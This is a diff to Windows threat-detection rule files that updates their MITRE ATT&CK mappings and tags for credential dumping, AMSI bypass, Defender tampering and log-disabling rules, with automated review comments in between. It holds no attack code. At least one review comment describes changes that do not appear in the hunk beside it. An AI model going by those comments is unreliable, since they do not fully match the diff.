 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable", "user.id"]
diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml
index 92be7b8f51b..fb71341678b 100644
--- a/rules/windows/credential_access_wireless_creds_dumping.toml
+++ b/rules/windows/credential_access_wireless_creds_dumping.toml
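Review bot: The threat rewrite leaves `T1003` OS Credential Dumping as the rule's only technique while deleting `T1552`/`T1552.001` Credentials In Files, yet a rule keyed on `web.config` file opens (per the file name and the `event.action:open` fragment in the hunk header) is about credentials stored in application configuration, which is exactly what T1552.001 describes; T1003 covers extracting credential material from the OS (LSASS, SAM, NTDS). Consider restoring `T1552.001` under the TA0006 entry instead of, or alongside, `T1003`. Dropping the Collection entry and the `Tactic: Collection` tag together is consistent. Also, the new tags list ends with `"Resources: Investigation Guide"` without the trailing comma every other multi-line tags list in this patch uses.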
@@ -2,7 +2,7 @@
 creation_date = "2022/11/01"
 integration = ["endpoint", "system", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [transform]
 [[transform.osquery]]
@@ -96,7 +96,21 @@ references = [
 risk_score = 73
 rule_id = "2de87d72-ee0c-43e2-b975-5f0b029ac600"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Tactic: Discovery",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -109,13 +123,31 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
index c6f704addd6..ab0b32e27a3 100644
--- a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
+++ b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [transform]
 [[transform.osquery]]
@@ -104,7 +104,21 @@ This rule looks for the execution of the `attrib.exe` utility with a command lin risk_score = 21 rule_id = "4630d948-40d4-4cef-ac69-4002e29bc3db" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" 
@@ -126,18 +140,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" +[[rule.threat.technique.subtechnique]] +id = "T1222.001" +name = "Windows File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/001/" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml index e158e20003b..f239ebb7b8f 100644 --- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml +++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] 
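Review bot: The new Persistence `[[rule.threat]]` entry carries only the TA0003 tactic and no technique, so the `"Tactic: Persistence"` tag added in the previous hunk asserts a tactic that the mapping does not tie to any observable technique. Either add the technique the query actually evidences under this entry or state in the rule's note why the tactic alone applies. The same tactic-only pattern appears for Execution in the msbuild_started_by_office_app and msbuild_started_by_system_process threat hunks later in this chunk.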
@@ -132,21 +132,39 @@ event.category:"process" and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml index 1512d6e2c06..852a9a680ae 100644 --- a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml +++ b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml @@ -4,7 +4,7 @@ integration = ["windows", "system"] maturity = "production" min_stack_comments = "ES|QL inline stats became generally available in 9.3.0, MV_CONTAINS is in preview since 9.2." min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] 
@@ -110,18 +110,34 @@ from logs-windows.forwarded*, logs-system.security* metadata _id, _version, _ind [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.001" +name = "Clear Windows Event Logs" +reference = "https://attack.mitre.org/techniques/T1070/001/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_clearing_windows_console_history.toml b/rules/windows/defense_evasion_clearing_windows_console_history.toml index 7e23d925997..f05d40e1010 100644 --- a/rules/windows/defense_evasion_clearing_windows_console_history.toml +++ b/rules/windows/defense_evasion_clearing_windows_console_history.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/22" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Austin Songer"] 
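Review bot: T1070.001 (Clear Windows Event Logs) is added to a rule whose file name and existing mapping (T1562.002, Disable Windows Event Logging) describe disabling audit policy rather than clearing logs; unless the ES|QL query above this hunk also matches log-clearing events, the new subtechnique overstates what the rule observes. The disabling_windows_logs threat hunk further down adds the same T1070.001 entry and raises the same question. Consider keeping T1562.002 and T1562.006 only, or documenting which query clause evidences clearing.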
@@ -64,7 +64,21 @@ references = [ risk_score = 47 rule_id = "b5877334-677f-4fb9-86d5-a9721274223b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -87,18 +101,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.003" name = "Clear Command History" reference = "https://attack.mitre.org/techniques/T1070/003/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml index 942482a1f80..c2f04f5a873 100644 --- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] @@ -98,28 +98,24 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml index f8fae831aa8..7e89e09c3a2 100644 --- a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml +++ b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml 
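Review bot: Removing the `[[rule.threat.technique]]` T1562 (Impair Defenses) header while keeping the `[[rule.threat.technique.subtechnique]]` T1562.002 lines re-parents that subtechnique: a TOML array-of-tables entry attaches to the most recently opened parent element, which on the new side is the T1070 (Indicator Removal) technique, so T1562.002 now sits under T1070 and no longer matches its parent id. Either restore the four T1562 header lines ahead of the subtechnique or drop the subtechnique together with its parent. The restored lines are shown below; the rest of the hunk is unchanged.
```toml
# … unchanged: T1070 technique and T1070.001 subtechnique …
[[rule.threat.technique]]
id = "T1562"
name = "Impair Defenses"
reference = "https://attack.mitre.org/techniques/T1562/"
[[rule.threat.technique.subtechnique]]
id = "T1562.002"
# … unchanged: T1562.002 name/reference and the TA0005 tactic block …
```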
@@ -2,7 +2,7 @@ creation_date = "2023/01/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -126,18 +126,24 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" - [[rule.threat.technique.subtechnique]] id = "T1553.006" name = "Code Signing Policy Modification" reference = "https://attack.mitre.org/techniques/T1553/006/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml index 90f5cb482fd..bbf8c289d02 100644 --- a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml +++ b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
@@ -18,7 +18,17 @@ name = "Suspicious Communication App Child Process" risk_score = 47 rule_id = "adbfa3ee-777e-4747-b6b0-7bd645f30880" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Elastic Endgame"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", +] timestamp_override = "event.ingested" type = "eql" 
@@ -227,31 +237,41 @@ Communication apps like Slack, WebEx, and Teams are integral to modern workflows [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_defender_disabled_via_registry.toml b/rules/windows/defense_evasion_defender_disabled_via_registry.toml index 14fbccc9270..6194cfb8572 100644 --- a/rules/windows/defense_evasion_defender_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_defender_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
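Review bot: The swap from Execution/T1203 to Persistence/T1554 and the added T1055 (Process Injection) are not accompanied by any visible query change, and a process-start rule keyed on communication-app child processes does not by itself evidence injection or a compromised host binary. T1036.001 (Invalid Code Signature) is the one addition a child-process rule with a signature check could plausibly support, but the query is outside this hunk so that cannot be confirmed here. If the query was extended to cover the new behaviors, say so in the rule note; otherwise keep the old side's T1203/Execution entry, which also means reverting the `"Tactic: Persistence"` tag swap in the preceding tags hunk.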
@@ -108,7 +108,6 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -118,13 +117,20 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml index bfa1d4320b9..0666acac376 100644 --- a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml +++ b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] 
@@ -108,18 +108,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_disabling_windows_logs.toml b/rules/windows/defense_evasion_disabling_windows_logs.toml index 918d32f3d95..8a2c924a761 100644 --- a/rules/windows/defense_evasion_disabling_windows_logs.toml +++ b/rules/windows/defense_evasion_disabling_windows_logs.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/06" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic", "Ivan Ninichuck", "Austin Songer"] 
@@ -103,18 +103,34 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.001" +name = "Clear Windows Event Logs" +reference = "https://attack.mitre.org/techniques/T1070/001/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" +[[rule.threat.technique.subtechnique]] +id = "T1562.006" +name = "Indicator Blocking" +reference = "https://attack.mitre.org/techniques/T1562/006/" + + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml index 4d1b9d2f617..e6b5d148708 100644 --- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -63,7 +63,21 @@ note = """## Triage and analysis risk_score = 47 rule_id = "201200f1-a99b-43fb-88ed-f65a45c4972c" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -76,18 +90,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
diff --git a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml index 36fa31a2960..f5b76cd15e6 100644 --- a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml +++ b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/08" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -64,7 +64,21 @@ references = ["https://www.joesandbox.com/analysis/476188/1/html"] risk_score = 73 rule_id = "416697ae-e468-4093-a93d-59661fa619ec" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
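Review bot: `"Tactic: Execution"` is added to this rule's tags, but the threat hunk for the same file on the next line only reshuffles whitespace around the T1218/T1218.002 Defense Evasion entry and adds no Execution `[[rule.threat]]`, so the tag has no mapping behind it and would likely be reported as an orphan tactic by the Tactic-tag consistency test this patch series introduces (unless an Execution entry exists in an unchanged part of the file). The same tag-without-mapping pattern appears in the wuauclt, msbuild_started_renamed and msbuild_started_unusal_process sections later in this chunk. Either drop the `"Tactic: Execution",` line or add an Execution entry with the technique the query evidences.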
@@ -86,18 +100,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.002" name = "Control Panel" reference = "https://attack.mitre.org/techniques/T1218/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml index 59086cf0516..2cc57b1fcb1 100644 --- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml +++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -106,7 +106,21 @@ references = ["https://dtm.uk/wuauclt/"] risk_score = 47 rule_id = "edf8ee23-5ea7-4123-ba19-56b41e424ae3" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -124,13 +138,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml index 15868ad4ecf..93810f62173 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml 
